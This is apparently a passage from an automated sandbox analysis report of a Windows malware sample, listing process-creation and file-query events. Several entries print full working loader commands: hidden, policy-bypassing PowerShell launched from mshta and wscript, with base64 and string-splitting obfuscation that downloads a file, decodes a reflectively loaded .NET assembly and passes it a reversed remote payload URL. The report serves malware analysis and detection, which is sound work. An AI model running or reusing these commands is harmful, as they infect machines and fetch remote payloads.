icagicagicagicagicagicagicagicagicaglu5htuugicagicagicagicagicagicagicagicagicagicagicagimnubiigicagicagicagicagicagicagicagicagicagicagicaglw5hbuvzuefdzsagicagicagicagicagicagicagicagicagicagicagicb5cwfmv2ztccagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicrcew86olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4xmjgumje1lziyni9zzwv0agvwb3nzawjszxroaw5nc2zvcmvudglyzxrpbwv0b2dpdmvtzwjlc3qudelgiiwijevodjpbufbeqvrbxhnlzxrozxbvc3npymxldghpbmdzzm9yzw50axjldgltzxrvz2l2zw1lymvzdc52qnmildasmck7c3rbclqtc0xlzxaomyk7sukgicagicagicagicagicagicagicagicagicagicagicagiirltny6qvbqrefuqvxzzwv0agvwb3nzawjszxroaw5nc2zvcmvudglyzxrpbwv0b2dpdmvtzwjlc3qudkjzig=='+[char]34+'))')))"
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnaedhaw1hz2vvcmwgpsbezndodhrwczovlzmxmduuzmlszscrj21hawwuy29tl2fwas8nkydmawxll2dldd9mascrj2xla2v5pxnovfankydiyknqwdhvlwxpjysndenxsexhnl8ween5lxhsnhruegxbvmjrotutzhzpves1y0fsyu5kuwpiyjntzxhmd1f6s21uwgcmc2tpchjlzz10cnvljnbrx3zpzd1lmdewotyzogm5ymziotu3mtczmjuzmtmwowi1zmy3yybeznc7aedhd2viq2xpzw50iccrjz0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddtor2enkydpbwfnzuj5dgvzid0gaedhd2viq2xpzw50lkqnkydvd25sb2fkjysnrgf0yshor2fpbwfnzvvybck7aedhascrj21hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcoaedhaw1hz2vcexrlcyk7aedhc3rhcnrgbgfnid0grgz3pdxcqvnfnjrfu1rbulq+pkrmdztor2flbmrgbgfnid0grgynkyd3pdxcqvnfnjrfru5epj5eznc7aedhc3rhcnrjbmrleca9ighhywltywdlvgv4dccrjy5jbmrlee9mkghhyxn0yxj0rmxhzyk7aedhzw5ksw5kzxggpsbor2fpbwfnzvrlehqusw5kzxhpzicrjyhor2flbmrgbgfnkttor2fzdgfydeluzgv4ic1nzsawic1hbmqgaedhzw5ksw5kzxgglwd0ighhyxmnkyd0yxj0sw5kzxg7aedhc3rhcnrjbmrlecarpsbor2fzdgfydeynkydsywcutgvuz3roo2hhywjhc2u2nexlbmd0aca9ighhywvuzeluzgv4ic0gaedhc3rhcicrj3rjbmrledtor2fiyxnlnjrdb21tyw5kid0gaedhaw1hz2vuzxh0lln1ynn0cmluzyhor2fzdgenkydydeluzgv4lcbor2fiyxnlnjrmzw5ndggpo2hhywjhc2u2nfjldmvyc2vkid0glwpvaw4gkghhywjhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksboovkgrm9yrwfjac1pymply3qgeybor2ffih0pwy0xli4tkghhywjhc2u2nenvbw1hbmqutgvuz3rokv07aedhy29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6ricrj3jvbujhc2u2nfn0cmluzyhor2fijysnyscrj3nlnjrszxzlcnnlzck7aedhbg9hzgvkqxnzzw1ibhkgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkghhywnvbw1hbmrcexrlcyk7aedhdmfptscrj2v0ag9kid0gw2rubglilklpjysnlkhvbwvdlkdlde1ldghvzcgnkydezndwqulezncpo2hhyxzhau1ldghvzc5jbnzva2uoaedhbnvsbcwgqcheznd0ehquulrdq0nsvi82mjivnteyljgyms41os4zmi8vonb0dghezncsiermd2rlc2f0axzhzg9ezncsiermd2rlc2f0axzhzg9ezncsiermd2rlc2f0axzhzg9ezncsiermd2fzcg5ldf9jb21wawxlckrmdywgrgz3zgvzyxrpdmfkb0rmdywgrgz3zgvzyxrpdicrj2fkbycrj0rmdyxezndkzxnhdgl2ywrvrgz3lermd2rlc2f0axzhzg9ezncsrgz3zgvzyxrpdmfkb0rmdyxezndkzxnhjysndgl2ywrvrgz3lermd2rlc2f0axzhzg9ezncsrgz3murmdyxezndkjysnzxnhdgl2ywrvrgz3ksk7jykgic1jukvwtefdrshbq2hhcl02octbq2hhcl0xmdirw0noyxjdmte5ksxbq2hhcl0zos1jukvwtefdrsagj045wscsw0noyxjdmti0lvjluexbq0ugichbq2hhcl0xmdqrw0noyxjdnzerw0noyxjdotcplftdagfyxtm2kxwgliggjgvodjpjb21zuevjwzqsmjqsmjvdlupvsw4njyk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('hgaimageurl = dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shtp'+'hbcpx8o-lo'+'tcqhlg6_0xcy-xl4tnxlavbq95-dvitk5carandqjbb3mexfwqzkmtxg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c dfw;hgawebclient '+'= new-object system.net.webclient;hga'+'imagebytes = hgawebclient.d'+'ownload'+'data(hgaimageurl);hgai'+'magetext = [system.text.encoding]::utf8.getstring(hgaimagebytes);hgastartflag = dfw<<base64_start>>dfw;hgaendflag = df'+'w<<base64_end>>dfw;hgastartindex = hgaimagetext'+'.indexof(hgastartflag);hgaendindex = hgaimagetext.indexof'+'(hgaendflag);hgastartindex -ge 0 -and hgaendindex -gt hgas'+'tartindex;hgastartindex += hgastartf'+'lag.length;hgabase64length = hgaendindex - hgastar'+'tindex;hgabase64command = hgaimagetext.substring(hgasta'+'rtindex, hgabase64length);hgabase64reversed = -join (hgabase64command.tochararray() n9y foreach-object { hga_ })[-1..-(hgabase64command.length)];hgacommandbytes = [system.convert]::f'+'rombase64string(hgab'+'a'+'se64reversed);hgaloadedassembly = [system.reflection.assembly]::load(hgacommandbytes);hgavaim'+'ethod = [dnlib.io'+'.home].getmethod('+'dfwvaidfw);hgavaimethod.invoke(hganull, @(dfwtxt.rtcccrv/622/512.821.59.32//:ptthdfw, dfwdesativadodfw, dfwdesativadodfw, dfwdesativadodfw, dfwaspnet_compilerdfw, dfwdesativadodfw, dfwdesativ'+'ado'+'dfw,dfwdesativadodfw,dfwdesativadodfw,dfwdesativadodfw,dfwdesa'+'tivadodfw,dfwdesativadodfw,dfw1dfw,dfwd'+'esativadodfw));') -creplace([char]68+[char]102+[char]119),[char]39-creplace 'n9y',[char]124-replace ([char]104+[char]71+[char]97),[char]36)| .( $env:comspec[4,24,25]-join'')"
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jej5byagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfezc1uevbficagicagicagicagicagicagicagicagicagicagicagic1nru1crvjezuzptklusu9oicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb24uzexmiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbqbcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicageu56eg4sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagihrzdvksdwludcagicagicagicagicagicagicagicagicagicagicagicbralvxbhdkyunavyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagd0epoycgicagicagicagicagicagicagicagicagicagicagicaglu5htuugicagicagicagicagicagicagicagicagicagicagicagimnubiigicagicagicagicagicagicagicagicagicagicagicaglw5hbuvzuefdzsagicagicagicagicagicagicagicagicagicagicagicb5cwfmv2ztccagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicrcew86olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4xmjgumje1lziyni9zzwv0agvwb3nzawjszxroaw5nc2zvcmvudglyzxrpbwv0b2dpdmvtzwjlc3qudelgiiwijevodjpbufbeqvrbxhnlzxrozxbvc3npymxldghpbmdzzm9yzw50axjldgltzxrvz2l2zw1lymvzdc52qnmildasmck7c3rbclqtc0xlzxaomyk7sukgicagicagicagicagicagicagicagicagicagicagicagiirltny6qvbqrefuqvxzzwv0agvwb3nzawjszxroaw5nc2zvcmvudglyzxrpbwv0b2dpdmvtzwjlc3qudkjzig=='+[char]34+'))')))"Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnaedhaw1hz2vvcmwgpsbezndodhrwczovlzmxmduuzmlszscrj21hawwuy29tl2fwas8nkydmawxll2dldd9mascrj2xla2v5pxnovfankydiyknqwdhvlwxpjysndenxsexhnl8ween5lxhsnhruegxbvmjrotutzhzpves1y0fsyu5kuwpiyjntzxhmd1f6s21uwgcmc2tpchjlzz10cnvljnbrx3zpzd1lmdewotyzogm5ymziotu3mtczmjuzmtmwowi1zmy3yybeznc7aedhd2viq2xpzw50iccrjz0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddtor2enkydpbwfnzuj5dgvzid0gaedhd2viq2xpzw50lkqnkydvd25sb2fkjysnrgf0yshor2fpbwfnzvvybck7aedhascrj21hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcoaedhaw1hz2vcexrlcyk7aedhc3rhcnrgbgfnid0grgz3pdxcqvnfnjrfu1rbulq+pkrmdztor2flbmrgbgfnid0grgynkyd3pdxcqvnfnjrfru5epj5eznc7aedhc3rhcnrjbmrleca9ighhywltywdlvgv4dccrjy5jbmrlee9mkghhyxn0yxj0rmxhzyk7aedhzw5ksw5kzxggpsbor2fpbwfnzvrlehqusw5kzxhpzicrjyhor2flbmrgbgfnkttor2fzdgfydeluzgv4ic1nzsawic1hbmqgaedhzw5ksw5kzxgglwd0ighhyxmnkyd0yxj0sw5kzxg7aedhc3rhcnrjbmrlecarpsbor2fzdgfydeynkydsywcutgvuz3roo2hhywjhc2u2nexlbmd0aca9ighhywvuzeluzgv4ic0gaedhc3rhcicrj3rjbmrledtor2fiyxnlnjrdb21tyw5kid0gaedhaw1hz2vuzxh0lln1ynn0cmluzyhor2fzdgenkydydeluzgv4lcbor2fiyxnlnjrmzw5ndggpo2hhywjhc2u2nfjldmvyc2vkid0glwpvaw4gkghhywjhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksboovkgrm9yrwfjac1pymply3qgeybor2ffih0pwy0xli4tkghhywjhc2u2nenvbw1hbmqutgvuz3rokv07aedhy29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6ricrj3jvbujhc2u2nfn0cmluzyhor2fijysnyscrj3nlnjrszxzlcnnlzck7aedhbg9hzgvkqxnzzw1ibhkgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkghhywnvbw1hbmrcexrlcyk7aedhdmfptscrj2v0ag9kid0gw2rubglilklpjysnlkhvbwvdlkdlde1ldghvzcgnkydezndwqulezncpo2hhyxzhau1ldghvzc5jbnzva2uoaedhbnvsbcwgqcheznd0ehquulrdq0nsvi82mjivnteyljgyms41os4zmi8vonb0dghezncsiermd2rlc2f0axzhzg9ezncsiermd2rlc2f0axzhzg9ezncsiermd2rlc2f0axzhzg9ezncsiermd2fzcg5ldf9jb21wawxlckrmdywgrgz3zgvzyxrpdmfkb0rmdywgrgz3zgvzyxrpdicrj2fkbycrj0rmdyxezndkzxnhdgl2ywrvrgz3lermd2rlc2f0axzhzg9ezncsrgz3zgvzyxrpdmfkb0rmdyxezndkzxnhjysndgl2ywrvrgz3lermd2rlc2f0axzhzg9ezncsrgz3murmdyxezndkjysnzxnhdgl2ywrvrgz3ksk7jykgic1jukvwtefdrshbq2hhcl02octbq2hhcl0xmdirw0noyxjdmte5ksxbq2hhcl0zos1jukvwtefdrsagj045wscsw0noyxjdmti0lvjluexbq0ugichbq2hhcl0xmdqrw0noyxjdnzerw0noyxjdotcplftdagfyxtm2kxwgliggjgvodjpjb21zuevjwzqsmjqsmjvdlupvsw4njyk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('hgaimageurl = dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shtp'+'hbcpx8o-lo'+'tcqhlg6_0xcy-xl4tnxlavbq95-dvitk5carandqjbb3mexfwqzkmtxg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c dfw;hgawebclient '+'= new-object system.net.webclient;hga'+'imagebytes = hgawebclient.d'+'ownload'+'data(hgaimageurl);hgai'+'magetext = [system.text.encoding]::utf8.getstring(hgaimagebytes);hgastartflag = dfw<<base64_start>>dfw;hgaendflag = df'+'w<<base64_end>>dfw;hgastartindex = hgaimagetext'+'.indexof(hgastartflag);hgaendindex = hgaimagetext.indexof'+'(hgaendflag);hgastartindex -ge 0 -and hgaendindex -gt hgas'+'tartindex;hgastartindex += hgastartf'+'lag.length;hgabase64length = hgaendindex - hgastar'+'tindex;hgabase64command = hgaimagetext.substring(hgasta'+'rtindex, hgabase64length);hgabase64reversed = -join (hgabase64command.tochararray() n9y foreach-object { hga_ })[-1..-(hgabase64command.length)];hgacommandbytes = [system.convert]::f'+'rombase64string(hgab'+'a'+'se64reversed);hgaloadedassembly = [system.reflection.assembly]::load(hgacommandbytes);hgavaim'+'ethod = [dnlib.io'+'.home].getmethod('+'dfwvaidfw);hgavaimethod.invoke(hganull, @(dfwtxt.rtcccrv/622/512.821.59.32//:ptthdfw, dfwdesativadodfw, dfwdesativadodfw, dfwdesativadodfw, dfwaspnet_compilerdfw, dfwdesativadodfw, dfwdesativ'+'ado'+'dfw,dfwdesativadodfw,dfwdesativadodfw,dfwdesativadodfw,dfwdesa'+'tivadodfw,dfwdesativadodfw,dfw1dfw,dfwd'+'esativadodfw));') -creplace([char]68+[char]102+[char]119),[char]39-creplace 'n9y',[char]124-replace ([char]104+[char]71+[char]97),[char]36)| .( $env:comspec[4,24,25]-join'')"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
